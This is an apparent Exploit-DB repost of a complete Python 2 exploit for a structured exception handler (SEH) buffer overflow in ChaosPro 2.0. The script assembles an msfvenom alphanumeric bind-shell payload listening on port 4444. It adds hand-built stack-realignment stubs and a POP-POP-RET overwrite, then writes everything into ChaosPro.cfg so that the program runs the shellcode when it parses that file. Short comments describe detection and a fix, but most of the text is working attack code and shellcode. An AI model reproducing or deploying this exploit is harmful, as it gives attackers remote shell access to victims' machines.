ChaosPro 2.0 – Buffer Overflow (SEH)

  • 作者: SYANiDE
    日期: 2019-10-28
  • 来源:https://www.exploit-db.com/exploits/47551/
  • # Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
    # Date: 2019-10-27
    # Exploit Author: Chase Hatch (SYANiDE)
    # Vendor Homepage: http://www.chaospro.de/
    # Software link: http://www.chaospro.de/cpro20.zip
    # Version: 2.0
    # Tested on: Windows XP Pro OEM
    
    #!/usr/bin/env python2
    import os, sys
    
    
    # sploit = "A"* 5000## Crash! 41414141 in SEH! via ProfilePath or PicturePath.Windows XP OEM
    # `locate pattern_create.rb | head -n 1` 5000#326d4431
    # `locate pattern_offset.rb | head -n 1` 326d4431 5000#2705
    # sploit = "A" * (2705 -4 - 126)# 2575
    # sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
    # `locate pattern_offset.rb|head -n 1` 61413561 2575
    # 16
    
    
    ################ Second stage ####################
    # NOTE(review): python2 script (see the shebang above) -- every literal
    # below is a byte string, and `sploit` is never executed here: it is only
    # written to disk by ret_cfg() at the bottom of the file.
    # Defender's note: the trigger is a ChaosPro.cfg whose PicturePath (or
    # ProfilePath, per the crash note above) value is ~2.7 KB long; a parser
    # that bounds the copied length of that value would never reach the SEH
    # record. Detection: flag a ChaosPro.cfg whose path value is far longer
    # than any real filesystem path.
    sploit = "A"*16
    #msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh 
    #, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
    sploit += (
    "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
    "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
    "\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
    "\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
    "\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
    "\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
    "\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
    "\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
    "\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
    "\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
    "\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
    "\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
    "\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
    "\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
    "\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
    "\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
    "\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
    "\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
    "\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
    "\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
    "\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
    "\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
    "\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
    "\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
    "\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
    "\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
    "\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
    "\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
    "\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
    "\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
    "\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
    "\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
    "\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
    "\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
    "\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
    "\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
    "\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
    "\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
    "\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
    "\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
    "\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
    "\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
    "\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
    "\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
    "\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
    "\x6f\x39\x45\x41\x41"
    ) # 710 bytes
    sploit += "A" * (2575 - 16 - 710)


    ################ First stage ####################

    # ESP: 0012E75C
    # ESP target: 0012FF98
    ## Need to align to four-byte and 16-byte boundaries:
    # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
    # 282.0000
    # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
    # 1551.0000
    # echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
    # 183C
    # 0012FF32 54 PUSH ESP
    # 0012FF33 58 POP EAX
    # 0012FF34 66:05 3C18 ADD AX,183C
    # 0012FF38 50 PUSH EAX
    # 0012FF39 5C POP ESP
    sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8


    # target instruction to push onto stack at new ESP:FFE4 JMP ESP # 4141E4FF
    # ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
    #0:	25 28 28 28 28 	andeax,0x28282828
    #5:	25 47 47 47 47 	andeax,0x47474747
    #a:	2d 7f 01 7f 7f 	subeax,0x7f7f017f
    #f:	2d 7f 01 01 01 	subeax,0x101017f
    # 14:	2d 03 18 3e 3e 	subeax,0x3e3e1803
    # 19:	50 	push eax
    sploit += (
    	"\x25\x28\x28\x28\x28"
    	"\x25\x47\x47\x47\x47"
    	"\x2d\x7f\x01\x7f\x7f"
    	"\x2d\x7f\x01\x01\x01"
    	"\x2d\x03\x18\x3e\x3e"
    	"\x50"
    ) # 26 bytes

    ## Realign new ESP with beginning of overflow buffer:
    ## New ESP should be four-byte and 16-byte aligned:
    # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
    # 122.0000
    # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
    # 671.0000
    # echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
    # A7C
    ## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
    # 0012FF54 44 INC ESP
    # 0012FF55 44 INC ESP
    # 0012FF56 44 INC ESP
    # 0012FF57 44 INC ESP
    # 0012FF58 44 INC ESP
    # 0012FF59 44 INC ESP
    # 0012FF5A 44 INC ESP
    # 0012FF5B 44 INC ESP
    sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8

    ## Going to have to carve out the address 0012F51C
    # ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
    # 0:	25 02 02 02 02 	andeax,0x2020202
    # 5:	25 51 51 51 51 	andeax,0x51515151
    # a:	2d 7f 01 7f 7f 	subeax,0x7f7f017f
    # f:	2d 01 01 01 61 	subeax,0x61010101
    #14:	2d 64 08 6d 1f 	subeax,0x1f6d0864
    #19:	50 	push eax
    sploit +=(
    	"\x25\x02\x02\x02\x02"
    	"\x25\x51\x51\x51\x51"
    	"\x2d\x7f\x01\x7f\x7f"
    	"\x2d\x01\x01\x01\x61"
    	"\x2d\x64\x08\x6d\x1f"
    	"\x50"
    ) # 26 bytes

    ## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
    # 5C POP ESP
    sploit += "\x5c" # 1

    sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)

    ################ RET from SEH: JMP SHORT - 126 ####################

    sploit += "\xeb\x80" + "\x41\x41" # 4
    # 00401B44|. 5F POP EDI
    # 00401B45|> 5E POP ESI
    # 00401B46\. C3 RETN
    sploit += "\x44\x1b\x40\x00"
    
    
    ################ build the config ####################
    ## Running from just outside base directory of ChaosPro:
    
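    def ret_cfg(inp):
    	"""Write *inp* as the PicturePath value of chaospro\\ChaosPro.cfg.

    	The path is relative, so this must run from just outside the
    	ChaosPro base directory. The file is overwritten ('w'), and the
    	``with`` block closes it -- an explicit close() is redundant.
    	"""
    	# do it live in PicturePath
    	cfg = """PicturePath %s""" % inp
    	with open("chaospro\\ChaosPro.cfg", 'w') as F:
    		F.write(cfg)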
    
    # The script's only side effect: drop the assembled buffer into the config
    # file. Nothing is run here; the overflow happens when ChaosPro later parses
    # that file (see the crash note near the top).
    ret_cfg(sploit)